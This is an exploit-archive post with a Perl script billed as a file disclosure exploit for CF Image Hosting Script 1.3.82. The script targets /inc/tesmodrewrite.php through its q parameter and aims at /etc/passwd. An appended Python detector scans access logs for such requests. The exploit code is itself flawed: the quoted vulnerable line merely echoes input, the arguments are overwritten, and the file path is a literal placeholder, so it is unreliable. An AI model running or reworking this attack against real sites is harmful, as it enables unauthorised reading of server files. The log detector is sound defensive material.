
CF Image Hosting Script 1.3.82 File Disclosure and Fix

 

#!/usr/bin/perl

 

#CF Image Hosting Script 1.3.82 File Disclosure Exploit

#Bugfounder and Exploitcoder: bd0rk

#Contact: www.sohcrew.school-of-hack.net #eMail: bd0rk[at]hackermail.com

#Affected software: CF Image Hosting Script 1.3.82

#Developer: http://www.phpkode.com

#Download: http://phpkode.com/download/p/CF_Image_Hosting_v1.3.zip

 

#Vulnerable code in /inc/tesmodrewrite.php, line 28

#echo "Current URL: " . $_GET['q'];

 

#Tested on Ubuntu-Linux

 

use LWP::Simple;

use LWP::UserAgent;

 

sub help()

{

print "Sploit: perl $0 [targethost] /dir/\n";

}

 

print "\nCF Image Hosting Script 1.3.82 File Disclosure Exploit\n";

print "\ By bd0rk bd0rk[at]hackermail.com\n";

 

($inc, $targethost, $dir, $file,) = @ARGV;

 

$inc="/inc/";

$file="tesmodrewrite.php?q=[APossibleFile]";

my $url = "http://".$targethost.$dir.$inc.$file;

 

my $useragent = LWP::UserAgent->new();

my $req = $useragent->get($url,":content_file"=>"[APossibleFile]");

 

if ($req->is_success)

 

{

 

print "$url <= H3h3!\n\n";

print "etc/passwd\n";

 

exit();

}

else

{

print "Sploit $url Mhhh!\n[!]".$req->status_line."\n";

 

exit();

}
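
A defender-side check, added here as an example that is not part of the original post: it scans web access logs for requests to the test script the post names (/inc/tesmodrewrite.php) and records the decoded q value each request carried. The log lines are constructed samples in combined log format, and the function names, record fields and classification labels are assumptions.

```python
import re
from urllib.parse import urlsplit, unquote, parse_qs

# Script path taken from the post; everything else here is illustrative.
TEST_SCRIPT = "/inc/tesmodrewrite.php"

# Leading fields of a common/combined-format access log line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def classify(q):
    """Coarse label for the decoded q value (labels are assumptions)."""
    if q is None:
        return "no-q"
    if q.startswith("/") or "../" in q or "..\\" in q:
        return "path-like"
    if re.search(r"[<>\"']", q):
        return "markup"
    return "other"

def find_hits(lines):
    """Return one record per request that reached the test script."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line we understand
        parts = urlsplit(m["target"])
        # The install may live under any directory, so match on the suffix;
        # decode and lowercase first so %-encoding or case changes still match.
        if not unquote(parts.path).lower().endswith(TEST_SCRIPT):
            continue
        values = parse_qs(parts.query, keep_blank_values=True).get("q")
        q = values[0] if values else None
        hits.append({"ip": m["ip"], "q": q, "kind": classify(q),
                     "served": int(m["status"]) < 400})
    return hits

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2013:13:55:36 +0000] "GET /gallery/inc/tesmodrewrite.php?q=%2Fetc%2Fpasswd HTTP/1.1" 200 41',
    '198.51.100.4 - - [10/Oct/2013:13:56:02 +0000] "GET /inc/TesModRewrite.php?q=%3Cscript%3E HTTP/1.1" 200 38',
    '192.0.2.15 - - [10/Oct/2013:13:57:10 +0000] "GET /index.php?q=cats HTTP/1.1" 200 5120',
    '192.0.2.15 - - [10/Oct/2013:13:58:44 +0000] "GET /inc/tesmodrewrite.php HTTP/1.1" 404 209',
]

if __name__ == "__main__":
    for hit in find_hits(SAMPLE_LOG):
        print(hit)
```

A record with `served` set to true means the test script still answers requests on that host.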
